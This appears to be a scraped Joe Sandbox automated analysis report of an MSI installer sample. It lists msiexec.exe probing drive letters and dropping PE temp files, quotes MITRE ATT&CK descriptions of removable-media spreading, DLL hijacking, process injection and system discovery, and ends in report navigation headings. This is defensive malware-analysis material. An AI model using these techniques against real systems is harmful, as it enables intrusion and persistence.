Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSIE27A.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSIE423.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSIE2C9.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSIE1CD.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSIE481.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSIE0A3.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSIE328.tmp	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIE27A.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIE2C9.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIE1CD.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIE328.tmp	Jump to dropped file

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report njYYgDgfwY.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\MSIE0A3.tmp

C:\Users\user\AppData\Local\Temp\MSIE1CD.tmp

C:\Users\user\AppData\Local\Temp\MSIE27A.tmp

C:\Users\user\AppData\Local\Temp\MSIE2C9.tmp

C:\Users\user\AppData\Local\Temp\MSIE328.tmp

C:\Users\user\AppData\Local\Temp\MSIE423.tmp

C:\Users\user\AppData\Local\Temp\MSIE481.tmp

C:\Users\user\AppData\Local\Temp\MSIbe4aa.LOG

Static File Info

General

File Icon

Network Behavior

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: msiexec.exePID: 5140, Parent PID: 3524

General

Chronological Activities

Analysis Process: msiexec.exePID: 3108, Parent PID: 564

General

Chronological Activities

Analysis Process: msiexec.exePID: 5488, Parent PID: 3108

General

Chronological Activities

Windows Analysis Report
njYYgDgfwY.msi